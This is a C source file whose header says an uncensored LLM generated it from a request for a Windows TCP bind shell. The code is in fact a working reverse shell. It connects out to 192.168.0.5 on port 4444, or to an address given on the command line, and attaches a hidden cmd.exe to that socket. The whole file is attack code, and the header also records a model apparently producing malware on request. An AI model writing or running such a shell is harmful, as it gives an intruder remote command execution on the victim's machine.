/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 18:17:32
 * Category: ReverseShell
 * Prompt: Generate a TCP bind shell in C for Windows
 * Compile Status: SUCCESS
 * Sample: 8
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>

#define DEFAULT_SERVER_IP "192.168.0.5"
#define DEFAULT_SERVER_PORT 4444


int main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET clientSocket;
    struct sockaddr_in serverAddress;

    // Initialize Winsock
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        printf("Error: WSAStartup failed.\n");
        return 1;
    }

    // Create a socket
    clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (clientSocket == INVALID_SOCKET)
    {
        printf("Error: Failed to create socket.\n");
        WSACleanup();
        return 1;
    }

    // Set up the server address structure
    memset(&serverAddress, 0, sizeof(serverAddress));
    serverAddress.sin_family = AF_INET;
    serverAddress.sin_port = htons(DEFAULT_SERVER_PORT);

    if (argc > 1)
    {
        unsigned int ip = inet_addr(argv[1]);
        if (ip != INADDR_NONE)
        {
            serverAddress.sin_addr.s_addr = ip;
        }
        else
        {
            serverAddress.sin_addr.s_addr = inet_addr(argv[1]);
        }
    }
    else
    {
        serverAddress.sin_addr.s_addr = inet_addr(DEFAULT_SERVER_IP);
    }


    // Connect to the server
    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) == SOCKET_ERROR)
    {
        printf("Error: Failed to connect to server.\n");
        closesocket(clientSocket);
        WSACleanup();
        return 1;
    }

    STARTUPINFO startup_info = {0};
    PROCESS_INFORMATION process_info = {0};

    startup_info.cb = sizeof(startup_info);
    startup_info.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    startup_info.hStdInput = startup_info.hStdOutput = startup_info.hStdError = (HANDLE)clientSocket;

    char cmd[] = "cmd.exe";
    if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &startup_info, &process_info))
    {
        printf("Error: CreateProcess failed.\n");
        closesocket(clientSocket);
        WSACleanup();
        return 1;
    }

    WaitForSingleObject(process_info.hProcess, INFINITE);
    CloseHandle(process_info.hThread);
    CloseHandle(process_info.hProcess);

    closesocket(clientSocket);
    WSACleanup();

    return 0;
}